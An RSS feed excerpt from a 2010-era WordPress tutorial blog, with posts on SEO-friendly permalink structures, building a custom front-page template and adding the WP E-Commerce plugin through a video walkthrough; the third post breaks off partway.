<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sam&#039;s Web Guide &#187; Other Tutorials</title>
	<atom:link href="http://samswebguide.com/category/tutorials/other-tutorials/feed/" rel="self" type="application/rss+xml" />
	<link>http://samswebguide.com</link>
	<description>The Evolving Web in Simple Terms</description>
	<lastBuildDate>Tue, 06 Dec 2011 00:00:48 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How To Choose The Best Permalink Structure For Your WordPress Blog</title>
		<link>http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/</link>
		<comments>http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/#comments</comments>
		<pubDate>Sun, 30 May 2010 21:17:06 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Blogging & SEO]]></category>
		<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Changing Permalink Structure]]></category>
		<category><![CDATA[customize]]></category>
		<category><![CDATA[Pretty Permalink Option]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[WordPress Blog]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=798</guid>
		<description><![CDATA[One of the simplest and most effective Search Engine Optimization (SEO) techniques you could implement when launching your WordPress blog is setting the correct &#8216;pretty&#8217; permalink structure for your site. Pretty permalinks are very important to help your blog&#8217;s content to be more understandable and accessible by both your visitors and search engines than URLs ...]]></description>
			<content:encoded><![CDATA[<p>One of the simplest and most <a title="SEO" href="http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/" target="_blank">effective  Search Engine </a><a title="SEO" href="http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/" target="_blank">Optimization  (SEO) techniques</a> you could implement when launching your WordPress  blog is setting the correct &#8216;pretty&#8217; permalink structure for your site.  Pretty permalinks are very important to help your blog&#8217;s content to be  more understandable and accessible by both your visitors and search  engines than URLs that are dynamically created by PHP that end up with  something like this: www.yourdomain.com/<strong>?p=1</strong></p>
<p>Below, I will show you the best permalink structure to use for SEO  and how to do it.<strong><img title="More..." src="http://samswebguide.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" alt="" /></strong></p>
<p><strong><span id="more-798"></span></strong></p>
<h3>What are Permalinks?</h3>
<p>Permalinks as WordPress.org defines it:</p>
<blockquote><p>&#8230;are the permanent URLs to your individual weblog  posts, as  well as categories and other lists of weblog postings. A  permalink is  what another weblogger will use to link to your article  (or section), or  how you might send a link to your story in an e-mail  message. The URL  to each post should be permanent, and never change —  hence <em>perma</em>link.</p></blockquote>
<p>So in, http://www.yourdomain.com/<strong>first-blog-post</strong>,  &#8216;first-blog-post&#8217; would be a pretty permalink and can be customized  within your WordPress dashboard to suit your preferences.</p>
<h3>How To Setup Your Permalinks</h3>
<p>To setup pretty permalinks for your WordPress blog you need to access  <em>Settings</em> in your WordPress dashboard, then select <em>Permalinks</em>.  You should see some options like below:</p>
<p><a rel="attachment  wp-att-803" href="http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/permalink-options/"><img title="permalink-options" src="http://samswebguide.com/wp-content/uploads/2010/05/permalink-options.jpg" alt="" width="468" height="209" /></a></p>
<p>Select the custom structure field and enter, <strong>/%postname%/ </strong>and  click <em>Save Changes</em>. This will create a permalink structure of  www.yourdomain.com<strong>/postname/</strong> which is the most effective URL  structure for your blog.</p>
<p>Also, depending on the needs of your site and if you would like more  structure to your URLs and posts, you could use <strong>/%category%/%postname%/ </strong>which would display the name of the category where your post is  filed as well.<strong> </strong>So it really can be customized however you like.  To see a full list of structure tags that can be used, please visit the <a title="Using Permalinks - WordPress Codex" href="http://codex.wordpress.org/Using_Permalinks" target="_blank">WordPress  Codex Here</a>.</p>
<h3>SEO Basics When Using &amp; Choosing Your Permalinks</h3>
<p>Generally, I always advice my clients that when choosing their domain   names, shorter URLs are better both for the human mind that tries to   remember them as well as being simpler for search engines. The same goes   for the URLs used when you create new posts for your blog.</p>
<p>For example, if the title of one of your blog posts is &#8220;How To Make A   Million Dollars By Doing Absolutely Nothing For A Year,&#8221; it would best   suit you if you customize your post &#8216;slug&#8217; (as in the URL for your  post) to something shorter and  simpler. Without any customization,  WordPress will automatically assign a  post slug to your article as   www.yourdomain.com/how-to-make-a-million-dollars-by-doing-absolutely-nothing-for-a-year,   this is not the most efficient permalink and basically does not get to   the point for the search engines.</p>
<p>A more appropriate post slug would be something like   www.yourdomain.com/how-to-make-a-million-dollars which provides less   unnecessary information, which will in turn make it easier for you to be   found through search engines.</p>
<p><strong>Customizing your &#8216;slug&#8217;</strong></p>
<p>Once you start typing the title of your new post, your article will  be automatically assigned a post slug and you will see an option appear  below the title field to edit your post permalink. To customize your  link simply click edit and change it to whatever you like.</p>
<p>Basically, customizing pretty permalinks allow you to have more  keyword rich URLs and gives you the added SEO benefit if other sites use  those URLs to link back to your site.</p>
<h3>Safely Migrating Your Permalink Structure</h3>
<p>If you&#8217;ve already started publishing to your WordPress blog and have  decided to change your entire permalink structure at a later stage, you  will not be able to safely make the change using the regular settings  alone since all links to your posts would be broken and return a &#8217;404  page not found&#8217; response to your visitors. You will also lose any  pagerank that your posts may have gained since the URLs would no longer  be valid.</p>
<p>Thankfully, there is a neat plugin that allows you to successfully  make the structure change without any disasters by generating a &#8217;301  permanent redirect&#8217; for your post pages. This simply tells search  engines and your visitors&#8217; browsers that the pages have moved to a new  URL and they would be seamlessly redirected. All pagerank and links  would be transferred.</p>
<p>The plugin can be downloaded here: <a title="Permalink Migration  &amp; Change" href="http://wordpress.org/extend/plugins/permalinks-migration-plugin-for-wordpress/" target="_blank">Permalink Migration</a> &#8211; After you&#8217;ve installed and  activated the plugin, you may then go ahead to change your permalink  structure in the regular WordPress dashboard settings.</p>
<h3>Conclusion</h3>
<p>Using pretty permalinks is absolutely imperative if you want to  become the authority within your niche and generate as much search  engine traffic as you possibly can.</p>
<p>If you&#8217;re thinking of changing your permalink structure or have done  so in the past please let us know by leaving a comment. We would love to  hear from you and also know how your search engine traffic improved  since making that change.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Choose+The+Best+Permalink+Structure+For+Your+WordPress+Blog&amp;link=http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/&amp;notes=One%20of%20the%20simplest%20and%20most%20effective%20%20Search%20Engine%20Optimization%20%20%28SEO%29%20techniques%20you%20could%20implement%20when%20launching%20your%20WordPress%20%20blog%20is%20setting%20the%20correct%20%27pretty%27%20permalink%20structure%20for%20your%20site.%20%20Pretty%20permalinks%20are%20very%20important%20to%20help%20your%20blog%27s%20content%20to%20be%20%20more%20understandable&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/05/30/how-to-choose-the-best-permalink-structure-for-your-wordpress-blog/feed/</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>How To Create A Custom Front Page In WordPress</title>
		<link>http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/</link>
		<comments>http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/#comments</comments>
		<pubDate>Thu, 20 May 2010 05:08:29 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Custom Front Page]]></category>
		<category><![CDATA[Customization]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=745</guid>
		<description><![CDATA[WordPress is undeniably one of the most robust and user friendly blogging and content management systems on the web. Although when many persons think of WordPress, they limit this amazing free open source software to blogging, while not realizing that this system is used by lots of top online companies around the world to provide ...]]></description>
			<content:encoded><![CDATA[<p>WordPress is undeniably one of the most robust and user friendly blogging and content management systems on the web. Although when many persons think of WordPress, they limit this amazing free open source software to blogging, while not realizing that this system is used by lots of top online companies around the world to provide news and other types of products and services. Top names such as CNN, BBC, Flickr and Time. So as bloggers, we don&#8217;t need to limit ourselves to the simple blog layout since WordPress provides quite a few options for further customization.</p>
<p>So today, I&#8217;ll show you how to create your own custom front page that can serve your visitors as a sales page, introductory page or just about anything you wish.</p>
<p><span id="more-745"></span></p>
<h3><strong>Step 1 &#8211; Create your custom page</strong></h3>
<p>To create a custom page, simply duplicate your <em><strong>page.php</strong></em> file which is found in your theme&#8217;s main directory and give it a name of your choice. This name must be different from &#8220;page.php&#8221; This is found in your &#8220;wp-admin/wp-content/themes/yourtheme/. Where &#8220;yourtheme&#8221; is the name of your currently active theme directory.</p>
<h3><strong>Step 2 &#8211; Add required code to your new file<br />
</strong></h3>
<p>Add the code below to the top of your new page, replacing “New Page  Template” with a name of your choice. This is what WordPress uses to detect the file type (whether its a template or not) and the template name.</p>
<p><code>&lt;?php /* Template Name: New Page Template  */ ?&gt;</code></p>
<h3><strong>Step 3 &#8211; Select your new page template</strong></h3>
<p>Once you&#8217;ve created and saved your new template, within your WordPress dashboard create a new page and select the new page template you created in the template  selection drop down menu and click <em>publish</em> as shown below.</p>
<p><img class="aligncenter size-full wp-image-753" title="pagetemplate" src="http://samswebguide.com/wp-content/uploads/2010/05/pagetemplate.jpg" alt="" width="267" height="380" /></p>
<h3><strong>Step 4 &#8211; Publish and set your new front page</strong></h3>
<p>Go to <em>Settings</em> then <em>Reading</em> in your WordPress dashboard and select the static page radio button and select your new page from the drop-down as your front page display as shown below and click save.</p>
<p><img class="aligncenter size-full wp-image-754" title="readingsettings" src="http://samswebguide.com/wp-content/uploads/2010/05/readingsettings.jpg" alt="" width="407" height="284" /></p>
<h3><strong>Final &#8211; Create your content</strong></h3>
<p>You may look at your original page.php template file to get an idea as to what  you may want to include in your custom page template like the header and  footer or possibly the sidebar. Remember, the content you place here is up to you.</p>
<p>See how simple that was? You have now created your custom front page for your WordPress blog. You may go ahead and add any content you like to your new page.</p>
<p>If you experience any difficulties in getting this done please feel free to ask for further assistance. I would love to help.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=How+To+Create+A+Custom+Front+Page+In+WordPress&amp;link=http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/&amp;notes=WordPress%20is%20undeniably%20one%20of%20the%20most%20robust%20and%20user%20friendly%20blogging%20and%20content%20management%20systems%20on%20the%20web.%20Although%20when%20many%20persons%20think%20of%20WordPress%2C%20they%20limit%20this%20amazing%20free%20open%20source%20software%20to%20blogging%2C%20while%20not%20realizing%20that%20this%20system%20is%20used%20by%20lots%20of%20top%20online%20compan&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/05/20/how-to-create-a-custom-front-page-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>How to Build an E-Commerce WordPress Site in 5 Minutes</title>
		<link>http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/</link>
		<comments>http://samswebguide.com/2010/04/27/build-an-e-commerce-wordpress-site-in-5-minutes/#comments</comments>
		<pubDate>Tue, 27 Apr 2010 18:30:28 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[Videos]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[E-Commerce]]></category>
		<category><![CDATA[Online Store]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=694</guid>
		<description><![CDATA[Here&#8217;s a quick video tutorial showing you how to add E-Commerce capabilities to your WordPress blog through a free plugin: WP E-Commerce. The basic solution is very easy and allows you to add an almost unlimited amount of products and connects you with the most popular payment gateways. In this video, Adam Purcell from Hungry ...]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s a quick video tutorial showing you how to add E-Commerce capabilities to your WordPress blog through a free plugin: WP E-Commerce. The basic solution is very easy and allows you to add an almost unlimited amount of products and connects you with the most popular payment gateways.</p>
<p>In this video, Adam Purcell from <a href="http://hungrydogmedia.com/" target="_blank">Hungry Dog Media</a> demonstrates how easy the plugin setup is and does it in under 5 minutes.</p>
<p><span id="more-694"></span></p>
<p><span style="color: #993300;"><strong>Note: The video is best viewed in full screen mode</strong></span></p>
<p style="text-align: center;"><object id="viddler" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="515" height="351" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowScriptAccess" value="always" /><param name="allowFullScreen" value="true" /><param name="flashvars" value="fake=1" /><param name="src" value="http://www.viddler.com/player/c214389/" /><param name="name" value="viddler" /><param name="allowfullscreen" value="true" /><embed id="viddler" type="application/x-shockwave-flash" width="515" height="351" src="http://www.viddler.com/player/c214389/" name="viddler" flashvars="fake=1" allowfullscreen="true" allowscriptaccess="always"></embed></object></p>
<p style="text-align: left;">Additional Features of the plugin include:</p>
<p><strong></strong></p>
<p><strong>Payment Options</strong><br />
Integrates with Google Checkout, Paypal, Payment Express, and many  other trusted payment processors.</p>
